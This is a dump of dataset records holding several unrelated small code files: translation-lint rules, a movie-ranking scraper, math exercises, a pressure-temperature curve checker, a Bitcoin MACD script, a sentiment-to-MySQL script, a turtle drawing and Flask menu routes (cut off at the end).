\"\"\"Rule wrapper that translates a glob-ish rule to a regex rule\"\"\"\n return SimpleRegexRule(name, fnmatch.translate(glob))\n\n_whitespaceRegex = re.compile(r\"\\s+\")\n\nclass ExactCopyRule(Rule):\n \"\"\"\n Requires that when a list of regex matches is present in the orignal text,\n the exact same list of matches is also present in the same order.\n\n This can be used, for example, to ensure GUI elements, numbers or URLs are the same in\n both the translated text and the original.\n \"\"\"\n def __init__(self, name, regex, severity=Severity.standard, aliases=defaultdict(str), ignore_whitespace=True, group=None):\n super().__init__(name, severity)\n self.regex = re.compile(regex)\n self.regex_str = regex\n self.aliases = aliases\n self.group = group\n self.ignore_whitespace = 
ignore_whitespace\n def description(self):\n return \"Matches if all instances of '%s' are the same (with %d aliases)\" % (self.regex_str, len(self.aliases))\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n origMatches = self.regex.findall(msgid)\n translatedMatches = self.regex.findall(msgstr)\n # Apply aliases\n origMatches = [self.aliases[x] or x for x in origMatches]\n translatedMatches = [self.aliases[x] or x for x in translatedMatches]\n # Apply group if\n if self.group is not None: # None - Use entire string. No groups must be present in regex\n origMatches = [m[self.group] for m in origMatches]\n translatedMatches = [m[self.group] for m in translatedMatches]\n # Apply whitespace filtering\n if self.ignore_whitespace:\n origMatches = [_whitespaceRegex.sub(\"\", x) or x for x in origMatches]\n translatedMatches = [_whitespaceRegex.sub(\"\", x) or x for x in translatedMatches]\n # Find index of first mismatch\n try:\n idx = next(idx for idx, (x, y) in\n enumerate(zip(origMatches, translatedMatches)) if x != y)\n yield \"[First expression mismatch at occurrence %d]\" % (idx + 1)\n except StopIteration: # No mismatch\n pass\n\nclass IgnoreByFilenameRegexWrapper(Rule):\n \"\"\"\n Ignore a rule (i.e. force zero hits) for a set of filenames defined by a regex.\n\n If you want to ignore a rule for all filenames starting with \"learn.\", you'd use:\n\n \"\"\"\n def __init__(self, filename_regex, child, invert=False):\n \"\"\"\n Keyword arguments:\n invert: Set this to true to invert this regex, i.e. mismatches of the regex lead to a ignored entry\n \"\"\"\n super().__init__(child.name)\n self.child = child\n self.invert = invert\n self.filename_regex = re.compile(filename_regex)\n self.filename_regex_str = filename_regex\n self.severity = child.severity\n def description(self):\n if self.invert:\n return \"%s (only applied to filenames matching '%s')\" % (self.child.description(), self.filename_regex_str)\n else:\n return \"%s (ignored for filenames matching '%s')\" % (self.child.description(), self.filename_regex_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if bool(self.filename_regex.match(filename)) != self.invert:\n return None\n yield from self.child(msgstr, msgid, tcomment, filename)\n\nclass IgnoreByFilenameListWrapper(Rule):\n \"\"\"\n Ignore a rule (i.e. 
force zero hits) for a set of filenames defined by a list of exact hits.\n \"\"\"\n def __init__(self, filenames, child):\n super().__init__(child.name)\n self.child = child\n self.filenames = frozenset(filenames)\n self.severity = child.severity\n def description(self):\n return \"%s (ignored for files %s)\" % (self.child.description(), str(list(self.filenames)))\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if filename in self.filenames:\n return None\n yield from self.child(msgstr, msgid, tcomment, filename)\n\nclass IgnoreByMsgidRegexWrapper(Rule):\n \"\"\"\n Ignore a rule if a regex search in the msgid returns a certain value.\n\n This can be useful to ignore special cases of translation which\n are distinguishable by the untranslated (english) text, e.g.\n \"Green's theorem\" as a special case of untranslated \"green\".\n\n Note that if a single regex hit is found, the entire string is ignore\n \"\"\"\n def __init__(self, msgid_regex, child):\n super().__init__(child.name)\n self.child = child\n self.msgid_regex = re.compile(msgid_regex)\n self.msgid_regex_str = msgid_regex\n self.severity = child.severity\n def description(self):\n return \"%s (ignored for msgids matching '%s')\" % (self.child.description(), self.msgid_regex_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if self.msgid_regex.search(msgid):\n return None\n yield from self.child(msgstr, msgid, tcomment, filename)\n\n\nclass IgnoreByMsgstrRegexWrapper(Rule):\n \"\"\"\n Ignore a rule if a regex search in the msgstr returns a certain value.\n\n This can be useful to ignore special cases of translation which\n are distinguishable by the untranslated (english) text, e.g.\n \"Green's theorem\" as a special case of untranslated \"green\".\n\n Note that if a single regex hit is found, the entire string is ignore\n \"\"\"\n def __init__(self, msgstr_regex, child):\n super().__init__(child.name)\n self.child = child\n self.msgstr_regex = re.compile(msgstr_regex)\n self.msgid_regex_str = msgstr_regex\n self.severity = child.severity\n def description(self):\n return \"%s (ignored for msgids matching '%s')\" % (self.child.description(), self.msgid_regex_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if self.msgstr_regex.search(msgstr):\n return None\n yield from self.child(msgstr, msgid, tcomment, filename)\n\nclass IgnoreByTcommentRegexWrapper(Rule):\n \"\"\"\n Ignore a rule if a regex search in the tcomment returns a certain value.\n\n This can be useful to ignore special cases of translation which\n are distinguishable by the untranslated (english) text, e.g.\n \"Green's theorem\" as a special case of untranslated \"green\".\n\n Note that if a single regex hit is found, the entire string is ignore\n \"\"\"\n def __init__(self, tcommentRegex, child):\n super().__init__(child.name)\n self.child = child\n self.tcommentRegex = re.compile(tcommentRegex)\n self.tcomment_regex_str = tcommentRegex\n self.severity = child.severity\n def description(self):\n return \"%s (ignored for tcomments matching '%s')\" % (self.child.description(), self.tcomment_regex_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if self.tcommentRegex.search(tcomment):\n return None\n yield from self.child(msgstr, msgid, tcomment, filename)\n\nclass TextListRule(Rule):\n \"\"\"\n A rule that excepts a text list of words (e.g. typos), each of which will generate a\n rule hit. 
The file is expected to contain one string per line.\n\n If the file does not exist, this method prints a red bold error message and does not\n generate any rule hits\n \"\"\"\n def __init__(self, name, filename, severity=Severity.standard, flags=re.UNICODE):\n super().__init__(name, severity)\n self.filename = filename\n self.regexes = []\n # Check if file exists\n if os.path.isfile(filename):\n with open(filename) as infile:\n for line in infile:\n rgx = line.strip().replace(\" \", r\"\\s+\")\n #Don't match in the middle of a word\n rgx = \"\\\\b{0}\\\\b\".format(rgx)\n self.regexes.append(re.compile(rgx, flags=flags))\n else: # File does not exist\n print(red(\"Unable to find text list file %s\" % filename, bold=True))\n def description(self):\n return \"Matches one of the strings in file %s\" % self.filename\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n for regex in self.regexes:\n hit = regex.search(msgstr)\n if hit:\n yield hit.group(0)\n\ndef findRule(rules, name):\n \"Find a rule by name\"\n try:\n next(rule for rule in rules if rule.name == name)\n except StopIteration:\n return None\n","sub_path":"Rules.py","file_name":"Rules.py","file_ext":"py","file_size_in_byte":17673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"268163545","text":"\"\"\"通过oop处理学生信息\"\"\"\r\n# class Student(object):\r\n# def __init__(self,name,age):\r\n# self.name=name\r\n# self.age=age\r\n\r\n# def show(self):\r\n# print('%s:%s'%(self.name,self.age))\r\n\r\n\r\n# stu1=Student('Morty',22)\r\n# stu2=Student('daisy',22)\r\n# stu2.show()\r\n# stu1.show()\r\n\r\n\"\"\"继承\"\"\"\r\n# 父类\r\n# class Animal(object):\r\n# def __init__(self,name):\r\n# self.name=name\r\n\r\n# def run(self):\r\n# print('{} run...'.format(self.name))\r\n\r\n# 子类\r\n# class Cat(Animal):\r\n# 重写父类方法\r\n# def __init__(self,name,color):\r\n# 调用父类的方法\r\n# super().__init__(name)\r\n# self.color=color\r\n# def show(self):\r\n# print('name={},color={}'.format(self.name,self.color))\r\n\r\n# 子类\r\n# class Dog(Animal):\r\n# def run(self):\r\n# print('{}run fast11...'.format(self.name))\r\n\r\n# 创建对象\r\n# cat=Cat('泡芙','白')\r\n# 调用方法\r\n# cat.run()\r\n# cat.show()\r\n\r\n# dog=Dog('汪汪')\r\n# dog.run()\r\n\r\n\"\"\"实现文件复制功能\"\"\"\r\n# with open('D:\\代码学习“十四五”,有“数”.txt','r',encoding='utf-8') as file:\r\n# print(file.read())\r\n# new_file=open('D:\\练习.txt','w',encoding='utf-8')\r\n# for i in file.readline():\r\n# new_file.write(file.read())\r\n# print('结束')\r\n\r\n# file.close()\r\n# new_file.close()\r\n\r\n# 爬取猫眼电影前100\r\nimport requests\r\nimport re\r\nimport json\r\nimport time\r\nimport random\r\nfrom requests.exceptions import RequestException\r\n\r\n\r\n#获取单一页面\r\ndef get_one_page(url):\r\n try:\r\n headers={\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'\r\n }\r\n response=requests.get(url=url,headers=headers)\r\n if response.status_code==200:\r\n return response.text\r\n return None\r\n except RequestException:\r\n return None\r\n\r\n#解析页面\r\ndef parse_one_page(html):\r\n pattern=re.compile(\r\n #获取排名\r\n r'
<dd>.*?board-index.*?>(\\d+?)</i>'\r\n #获取电影图片\r\n r'.*?data-src=\"(.*?)\".*?'\r\n #获取电影名称\r\n r'.*?class=\"name\".*?title=\"(.*?)\".*?'\r\n #电影主演\r\n r'.*?class=\"star\".+?(.*?)</p>'\r\n #发布时间\r\n r'.*?class=\"releasetime\".+?(.*?)</p>'\r\n #评分\r\n r'.*?class=\"integer\".+?(.*?)</i>'\r\n #评分\r\n r'.*?\"fraction\".+?(.*?)</i>.*?</dd>
    ',re.S\r\n )\r\n re_lists=re.findall(pattern,html)\r\n for re_list in re_lists:\r\n yield{\r\n 'index':re_list[0],\r\n 'image':re_list[1],\r\n 'title':re_list[2],\r\n 'actor':re_list[3].strip()[3:],\r\n 'time':re_list[4].strip()[5:],\r\n 'score':re_list[5]+re_list[6]\r\n }\r\n\r\n#获取所有的url\r\ndef url_list(offset):\r\n if offset==0:\r\n page_url='http://maoyan.com/board/4'\r\n return page_url\r\n else:\r\n page_url='http://maoyan.com/board/4'+'?offset='+str(offset)\r\n return page_url\r\n\r\n#保存数据\r\ndef write(final_result):\r\n with open('爬取猫眼电影.txt','a',encoding='utf-8') as file:\r\n file.write(json.dumps(final_result,ensure_ascii=False)+'\\n')\r\n\r\n#主函数\r\ndef main():\r\n offset_list=[0,10,20,30,40,50,60,70,80,90]\r\n for offset in offset_list:\r\n url=url_list(offset)\r\n html=get_one_page(url)\r\n result=parse_one_page(html)\r\n for i in range(15):\r\n final_result=next(result)\r\n print(final_result)\r\n write(final_result)\r\n\r\nif __name__=='__main__':\r\n main()\r\n time.sleep(1)","sub_path":"3.15学习.py","file_name":"3.15学习.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"563526367","text":"# Найти сумму и произведение цифр трехзначного числа, которое вводит пользователь.\nfrom functools import reduce\n\nqwe = 742\n\n\ndef sum_mult(q):\n list_int = [int(p) for p in str(q)]\n res_sum = sum(list_int)\n res_mult = reduce(lambda w, e: w * e, list_int)\n return res_sum, res_mult\n\n\nres_sum_mult = sum_mult(qwe)\nprint(res_sum_mult)\n\n# По введенным пользователем координатам двух точек вывести уравнение прямой,\n# проходящей через эти точки. ///////Общее уравнение прямой имеет вид y = kx + b.\n# Для какой-то конкретной прямой в уравнении коэффициенты k и b заменяются на числа,\n# например, y = 4x - 2. 
Задача сводится именно к нахождению этих коэффициентов.\n# //////////////////////////////////////////////////////////////////////////////\n# Алгоритм решения данной задаче на языке программирования будет таков:\n# Получить значения координат первой точки и присвоить их переменным, например x1 и y1.\n# Получить значения координат (x2, y2) второй точки.\n# Вычислить значение k по формуле k = (y1 - y2) / (x1 - x2).\n# Вычислить значение b по формуле b = y2 - k * x2.\n# Вывести на экран полученное уравнение.\n# А(3;2), а координаты B(-1;-1)\nx = ''\nx1 = 3\ny1 = 2\nx2 = -1\ny2 = -1\nk = (y1 - y2) / (x1 - x2)\nprint(k)\nb = y2 - k * x2\nprint(b)\n# y = 0.75 * x + 0.25\nimport math\n\n# Найти длину гипотенузы\n# По двум введенным пользователем катетам вычислить длину гипотенузы.\n# c = sqrt(a2 + b2),\n# c2 = a2 + b2\nq = int(input('=======>> a'))\nw = int(input('=======> b'))\n\n\ndef length_gipp(a, b):\n leng = round(math.sqrt(a ** 2 + b ** 2))\n\n return leng\n\n\nres_length_gipp = length_gipp(q, w)\nprint(res_length_gipp)\n\n","sub_path":"test01/sum_mult.py","file_name":"sum_mult.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"242484346","text":"import math\n\n\nclass PTCureve:\n \"\"\"\n 0 : 만족, 1: 불만족\n PTCureve().Check(Temp=110, Pres=0)\n \"\"\"\n def __init__(self):\n self.UpTemp = [0, 37.000000, 65.500000, 93.000000, 104.400000, 110.000000,\n 115.500000, 121.000000, 148.800000, 176.500000, 186.500000, 350.0]\n self.UpPres = [29.5, 29.500000, 30.500000, 36.500000, 42.000000, 45.600000,\n 49.000000, 54.200000, 105.000000, 176.000000, 200.000000, 592]\n self.BotTemp = [0, 37.000000, 149.000000, 159.000000, 169.000000, 179.000000,\n 204.000000, 232.000000, 260.000000, 287.700000, 350.000000]\n self.BotPres = [17.0, 17.000000, 17.000000, 17.300000, 17.600000, 20.000000,\n 31.600000, 44.300000, 58.000000, 71.000000, 100.000000]\n self.UpLineFunc = []\n self.BotLineFunc = []\n # 직교 함수를 그려 현재 포인트에서 PT 커브까지 거리를 계산하기 위해서 사용\n self.UpLineOrtFunc = []\n self.BotLineOrtFunc = []\n\n self._make_bound_UpLine()\n self._make_bound_BotLine()\n\n def _make_bound_func(self, Temp, Pres):\n \"\"\"\n 2점에 대한 1차원 함수 반환\n :param Temp: [a1, a2] == x\n :param Pres: [b1, b2] == y\n :return: func\n \"\"\"\n # y1 = ax1 + b\n # y2 = ax2 + b\n # a = (y1-y2)/(x1-x2)\n # b = y1 - {(y1-y2)/(x1-x2) * x1}\n get_a = (Pres[0] - Pres[1]) / (Temp[0] - Temp[1])\n get_b = Pres[0] - get_a * Temp[0]\n return lambda temp: get_a * temp + get_b\n\n def _make_bound_orthogonal_func(self, Temp, Pres):\n \"\"\"\n 2점에 대한 ax+by+c = 0\n :param Temp: [a1, a2] == x\n :param Pres: [b1, b2] == y\n :return: [a, b, c] List\n \"\"\"\n # y1 = ax1 + b\n # y2 = ax2 + b\n # a = (y1-y2)/(x1-x2)\n # b = y1 - {(y1-y2)/(x1-x2) * x1}\n get_a = (Pres[0] - Pres[1]) / (Temp[0] - Temp[1]) # slop\n get_b = Pres[0] - get_a * Temp[0]\n # y = get_a * x + get_b ==> ax + by + c = 0\n a = - get_a\n b = 1\n c = - get_b\n return [a, b, c]\n\n def _make_bound_UpLine(self):\n for i in range(len(self.UpTemp) - 1):\n self.UpLineFunc.append(self._make_bound_func(Temp=self.UpTemp[i:i+2], Pres=self.UpPres[i:i+2]))\n self.UpLineOrtFunc.append(self._make_bound_orthogonal_func(Temp=self.UpTemp[i:i+2], Pres=self.UpPres[i:i+2]))\n\n def _make_bound_BotLine(self):\n for i in range(len(self.BotTemp) - 1):\n self.BotLineFunc.append(self._make_bound_func(Temp=self.BotTemp[i:i+2], Pres=self.BotPres[i:i+2]))\n 
self.BotLineOrtFunc.append(self._make_bound_orthogonal_func(Temp=self.BotTemp[i:i+2], Pres=self.BotPres[i:i+2]))\n\n def _call_fun(self, Temp):\n UpF, BotF = 0, 0\n for i in range(len(self.UpTemp) - 1):\n if self.UpTemp[i] <= Temp < self.UpTemp[i + 1]:\n UpF = self.UpLineFunc[i]\n for i in range(len(self.BotTemp) - 1):\n if self.BotTemp[i] <= Temp < self.BotTemp[i + 1]:\n BotF = self.BotLineFunc[i]\n return UpF, BotF\n\n def _call_ort_fun(self, Temp):\n UpOrtF, BotOrtF = 0, 0\n for i in range(len(self.UpTemp) - 1):\n if self.UpTemp[i] <= Temp < self.UpTemp[i + 1]:\n UpOrtF = self.UpLineOrtFunc[i]\n for i in range(len(self.BotTemp) - 1):\n if self.BotTemp[i] <= Temp < self.BotTemp[i + 1]:\n BotOrtF = self.BotLineOrtFunc[i]\n return UpOrtF, BotOrtF\n\n def _get_pres(self, Temp):\n \"\"\"\n 온도 받아서 위아래 Pres 조건 반환\n :param Temp: [0~..]\n :return: [Up_pres, Bot_pres]\n \"\"\"\n UpF, BotF = self._call_fun(Temp=Temp)\n Up_pres, Bot_pres = UpF(Temp), BotF(Temp)\n return Up_pres, Bot_pres\n\n def _check_up_or_under(self, fun, Temp, Pres):\n Get_Pres = fun(Temp)\n if Get_Pres > Pres:\n return 0 # 입력된 Pres가 그래프보다 아래쪽에 존재\n elif Get_Pres == Pres:\n return 1 # 입력된 Pres가 그래프에 존재\n else:\n return 2 # 입력된 Pres가 그래프보다 위쪽에 존재\n\n def _check_in_or_out(self, Temp, Pres):\n UpF, BotF = self._call_fun(Temp=Temp)\n Upcond = self._check_up_or_under(UpF, Temp, Pres)\n Botcond = self._check_up_or_under(BotF, Temp, Pres)\n\n Reason = 0\n if Upcond == 2: Reason = 1 # Upcond 벗어난 경우\n if Botcond == 0: Reason = 2 # Botcond 벗어난 경우\n\n if Upcond == 2 or Botcond == 0:\n return [1, Reason] # PT커브 초과\n else:\n return [0, Reason] # PT커브에서 운전 중\n\n def _check_distance(self, Temp, Pres):\n \"\"\"\n 현재 온도 압력을 기준으로 Upline과 Botline과의 거리 계산\n :param Temp: 현재 온도\n :param Pres: 현재 압력\n :return: UpDis, BotDis\n \"\"\"\n d = 0\n UpOrtF, BotOrtF = self._call_ort_fun(Temp=Temp) # [a,b,c]\n # d = abs(a*x_1 + b*y_1 + c) / (math.sqrt(math.pow(a, 2) + math.pow(b, 2)))\n # x_1 = Temp\n # y_1 = Pres\n UpDis = abs(UpOrtF[0] * Temp + UpOrtF[1] * Pres + UpOrtF[2]) / \\\n (math.sqrt(math.pow(UpOrtF[0], 2) + math.pow(UpOrtF[1], 2)))\n BotDis = abs(BotOrtF[0] * Temp + BotOrtF[1] * Pres + BotOrtF[2]) / \\\n (math.sqrt(math.pow(BotOrtF[0], 2) + math.pow(BotOrtF[1], 2)))\n return UpDis, BotDis\n\n def Check(self, Temp, Pres):\n \"\"\"\n PT curve에 운전 중인지 확인\n :param Temp: 현재 온도\n :param Pres: 현재 압력\n :return: 0 만족, 1 불만족\n \"\"\"\n return self._check_in_or_out(Temp, Pres)[0]\n\n def Check_Dis(self, Temp, Pres):\n \"\"\"\n 현재 온도 압력을 기준으로 PT 커브에서 벗어난 경우 벗어난 거리 제공\n :param Temp: 현재 온도\n :param Pres: 현재 압력\n :return: 벗어난 거리\n \"\"\"\n Satisfiy, Reason =self._check_in_or_out(Temp, Pres)\n Updis, Botdis = self._check_distance(Temp, Pres)\n\n if Satisfiy == 0:\n return 0\n else:\n # 가장 짧은 거리\n return Updis if Updis < Botdis else Botdis\n","sub_path":"TOOL/TOOL_PTCurve.py","file_name":"TOOL_PTCurve.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"462474553","text":"\"\"\"\nMoving average convergence divergence (MACD)\nThis is another in the class of indicators that builds on top of moving averages of prices. This goes a step further than the APO.\n\nIt is similar in spirit to an absolute price oscillator in that it establishes the difference between a fast exponential moving average\nand a slow exponential moving average. 
However, in the case of MACD, we apply a smoothing exponential moving average to the MACD value\nitself in order to get the final signal output from the MACD indicator.\n\nOptionally, you may also look at the difference between MACD values and the EMA of the MACD values (signal) and visualize it as a histogram.\nA properly configured MACD signal can successfully capture the direction, magnitude, and duration of a trending instrument price.\n\"\"\"\nimport statistics as stats\nimport pandas as pd\nfrom pandas_datareader import data\nimport matplotlib.pyplot as plt\n\n# First day\nstart_date = '2014-01-01'\n# Last Day\nend_date = '2020-03-26'\n# download data\nbtc_data_all = data.DataReader('BTC-USD', 'yahoo', start_date, end_date)\n\nnum_periods_fast = 10 # fast EMA time period\nK_fast = 2 / (num_periods_fast + 1) # fast EMA smoothing factor\nema_fast = 0\n\nnum_periods_slow = 40 # slow EMA time period\nK_slow = 2 / (num_periods_slow + 1) # slow EMA smoothing factor\nema_slow = 0\n\nnum_periods_macd = 20 # MACD EMA time period\nK_macd = 2 / (num_periods_macd + 1) # MACD EMA smoothing factor\nema_macd = 0\n\nema_fast_values = [] # track fast EMA values for visualization purposes\nema_slow_values = [] # track slow EMA values for visualization purposes\nmacd_values = [] # track MACD values for visualization purposes\nmacd_signal_values = [] # MACD EMA values tracker\n\nmacd_histogram_values = [] # MACD - MACD-EMA\n\nfor close_price in btc_data_all.Close.values:\n if (ema_fast == 0): # first observation\n ema_fast = close_price\n ema_slow = close_price\n else:\n ema_fast = (close_price - ema_fast) * K_fast + ema_fast\n ema_slow = (close_price - ema_slow) * K_slow + ema_slow\n\n ema_fast_values.append(ema_fast)\n ema_slow_values.append(ema_slow)\n macd = ema_fast - ema_slow # MACD is fast_MA - slow_EMA\n\n if ema_macd == 0:\n ema_macd = macd\n else:\n ema_macd = (macd - ema_macd) * K_slow + ema_macd # signal is EMA of MACD values\n\n macd_values.append(macd)\n macd_signal_values.append(ema_macd)\n macd_histogram_values.append(macd - ema_macd)\n\nbtc_data_all = btc_data_all.assign(FastExponential10DayMovingAverage=pd.Series(ema_fast_values, index=btc_data_all.index))\nbtc_data_all = btc_data_all.assign(SlowExponential40DayMovingAverage=pd.Series(ema_slow_values, index=btc_data_all.index))\nbtc_data_all = btc_data_all.assign(MovingAverageConvergenceDivergence=pd.Series(macd_values, index=btc_data_all.index))\nbtc_data_all = btc_data_all.assign(Exponential20DayMovingAverageOfMACD=pd.Series(macd_signal_values, index=btc_data_all.index))\nbtc_data_all = btc_data_all.assign(MACDHistorgram=pd.Series(macd_histogram_values, index=btc_data_all.index))\n\nema_f = btc_data_all['FastExponential10DayMovingAverage']\nema_s = btc_data_all['SlowExponential40DayMovingAverage']\nmacd = btc_data_all['MovingAverageConvergenceDivergence']\nema_macd = btc_data_all['Exponential20DayMovingAverageOfMACD']\nmacd_histogram = btc_data_all['MACDHistorgram']\n\nfig = plt.figure()\nax1 = fig.add_subplot(311, ylabel='BTC price in $')\nbtc_data_all.Close.plot(ax=ax1, color='g', lw=2., legend=True)\nema_f.plot(ax=ax1, color='b', lw=2., legend=True)\nema_s.plot(ax=ax1, color='r', lw=2., legend=True)\nax2 = fig.add_subplot(312, ylabel='MACD')\nmacd.plot(ax=ax2, color='black', lw=2., legend=True)\nema_macd.plot(ax=ax2, color='g', lw=2., legend=True)\nax3 = fig.add_subplot(313, ylabel='MACD')\nmacd_histogram.plot(ax=ax3, color='r', kind='bar', legend=True, use_index=False)\nplt.show()\n","sub_path":"Trading 
Signals/moving_average_convergence_divergence.py","file_name":"moving_average_convergence_divergence.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"403825220","text":"\"\"\"This is the subclass of Transform function for Argentina (LATAM division).\n\nWe will define transform functions specific to Argentina here.\n\nAuthor: Maicol Contreras\nLast Modified: October 28, 2020\n\"\"\"\n\nimport pandas as pd\n\nfrom constants import comp_harm_constants\nfrom transform_functions.common_comp_harm_transform_functions import CommonCompHarmTransformFunctions\n\n\nclass LatamArgentinaTransformFunctions(CommonCompHarmTransformFunctions):\n \"\"\"\n All custom (uncommon) transform functions **SPECIFIC to\n individual processing task** must be defined as part\n of this class.\n \"\"\"\n ARGENTINA_SPECIFIC_CATEGORY_MAPPINGS = {\n \"(?i).*PAÑO.*ABSORBENT.*\": \"Other\",\n \"(?i).*REHABILI.*\": \"Other\",\n \"(?i).*IND.*METAL.*\": \"Other\",\n \"(?i).*CLIN.*OFTALMO.*\": \"Other\",\n \"(?i).*ANTITRANS.*\": \"Other\",\n \"(?i).*LAB.*CLINICO.*\": \"Other\",\n \"(?i).*PEG.*PROT.*DEN.*\": \"Other\",\n \"(?i).*CTO.*ONCOLOGI.*\": \"Other\",\n \"(?i).*GREMIO.*ASOCIA.*\": \"Other\",\n \"(?i).*IND.*ELDOM.*ELE.*\": \"Other\",\n \"(?i).*IND.*CONS.*MASI.*\": \"Other\",\n \"(?i).*C.D.\\sSENSIBILIDAD.*\": \"Other\",\n \"(?i).*EPS.*\": \"Other\",\n \"(?i).*CLIN.*PSICOLOG.*\": \"Other\",\n \"(?i).*PESQUERA.*\": \"Other\",\n\n \"(?i).*LEJIA.*\": \"Home Care\",\n \n \"(?i).*CREM.*ESCALDA.*\": \"Personal Care\",\n \"(?i).*C.D.\\sMULTIBENE.*\": \"Personal Care\",\n \"(?i).*C.D.\\sBLANQUE.*\": \"Personal Care\",\n }\n\n def __init__(self, config):\n self.config = config\n\n def apply_country_specific_category_mapping_to_HARMONIZED_CATEGORY_column(self,\n df,\n existing_category_col_name: str,\n leave_empty_if_no_match = False\n ):\n \"\"\"\n Helper function to invoke the common comp harm function that will help us apply\n country-specific mappings for HARMONIZED_CATEGORY column.\n \"\"\"\n return self.add_HARMONIZED_CATEGORY_column_using_existing_category_column_with_country_specific_mappings(\n df,\n LatamArgentinaTransformFunctions.ARGENTINA_SPECIFIC_CATEGORY_MAPPINGS,\n existing_category_col_name,\n leave_empty_if_no_match\n )\n","sub_path":"data_architect_misc/data_transformer/transform_functions/latam_argentina_transform_functions.py","file_name":"latam_argentina_transform_functions.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"544674254","text":"import math\n\nradius = input()\nwhile radius:\n pennies = 0\n r2 = radius**2\n for x in xrange(1, radius+1):\n pennies += int(math.sqrt(r2 - x**2) + 1)\n pennies = 4 * pennies + 1\n print(int(pennies))\n radius = input()","sub_path":"DMOJ/ccc08s2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"298663690","text":"from snownlp import SnowNLP\nimport pandas as pd\nimport os\nfrom sqlalchemy import create_engine\n\n#设置需要分析文件\nyp = os.path.join(os.path.abspath(\".\"),\"cj1.txt\")\n#读取每条评论分别进行情感测试\nqg = []\npj = []\nfor dp in open(yp,encoding=\"utf-8\"):\n s = SnowNLP(dp)\n qg.append(s.sentiments)\n pj.append(dp)\n#将数据整理为dataframe\ntext = pd.DataFrame({'qinggan':qg,'duanping':pj})\n\n#入库\n\nengine = create_engine(\n 
\"mysql+pymysql://python:123456@14.14.14.20:3306/python?charset=utf8\",\n echo=True)\n\n\npd.io.sql.to_sql(text,'qgfx',con=engine,schema='python',if_exists='append')\nengine.dispose()\n\n\n\n\n","sub_path":"Week_05/G20200389010185/mysnow.py","file_name":"mysnow.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"358997007","text":"import turtle\r\nturtle.shape(\"turtle\")\r\nturtle.speed(\"fastest\")\r\nturtle.penup()\r\nturtle.goto(0, - 270)\r\nturtle.pendown()\r\n\r\n\r\ndef draw(collichestvo: int, razmer: int, first_color: int):\r\n for i in range(collichestvo):\r\n turtle.colormode(255)\r\n turtle.color(0, 0, first_color)\r\n turtle.begin_fill()\r\n turtle.circle(razmer)\r\n turtle.penup()\r\n turtle.lt(90)\r\n turtle.fd(razmer*2)\r\n turtle.rt(90)\r\n turtle.pendown()\r\n turtle.end_fill()\r\n razmer = razmer * 0.75\r\n first_color += 40\r\n turtle.begin_fill()\r\n turtle.fd(razmer)\r\n turtle.lt(110)\r\n turtle.fd(razmer * 1.5)\r\n turtle.lt(70)\r\n turtle.fd(razmer)\r\n turtle.lt(70)\r\n turtle.fd(razmer * 1.5)\r\n turtle.lt(110)\r\n turtle.fd(razmer)\r\n turtle.end_fill\r\n\r\n\r\ndraw(3, 100, 90)\r\nturtle.mainloop()\r\n","sub_path":"snowman_def.py","file_name":"snowman_def.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"177114082","text":"# coding=utf-8\nimport json\n\nfrom flask import jsonify, render_template,flash,redirect,url_for\n\nfrom app import app\nfrom app.main.service.Item_cardapio_service import Item_cardapio_service\nfrom app.main.models.Item_cardapio import Item_cardapio_dao\nfrom app.main.models.Produto import Produto_dao\nfrom app.main.forms.Item_cardapio_forms import Item_cardapio_forms\nfrom app.main.util import to_string\n\nservice = Item_cardapio_service()\n\n@app.route(\"/cardapio\")\ndef cardapio():\n return render_template(\"cardapio.html\")\n\n@app.route(\"/itemCardapio/list\")\ndef lista_Item_cardapio():\n service.findAll()\n page = {\n \"titles\": [\"Código\", \"Nome\", \"Produto\", \"Quantidade de produto\", \"Qtd. 
Itens Extra\", \"Valor\", \"Tipo\"],\n \"header\": \"Item do Cardapio\",\n \"table\": \"Itens Cadastrados no Cardapio\"\n }\n resultados = create_cols(service.findAll())\n return render_template(\"listar.html\", page=page, resultados=resultados)\n\n\n@app.route(\"/itemCardapio/cadastro\", methods=[\"GET\", \"POST\"])\ndef cadastro_item_cardapio():\n form = Item_cardapio_forms()\n form.produto.choices = [(row.id_produto, row.nome) for row in Produto_dao.findAll()]\n if form.is_submitted():\n item = Item_cardapio_dao(str(form.nome.data), form.valor.data, form.produto.data, form.qtd_ingrediente.data, form.qtd_item_extra.data, form.tipo_item.data)\n service.salvar(item)\n return render_template('cadastro_item_cardapio.html', form=form)\n\ndef create_cols(list):\n lista = []\n for i in range(len(list)):\n resultado = dict()\n resultado['col1'] = to_string(list[i].id_item_cardapio)\n resultado['col2'] = to_string(list[i].nome)\n resultado['col3'] = to_string(list[i].produto.nome)\n resultado['col4'] = to_string(list[i].qtd_ingrediente)\n resultado['col5'] = 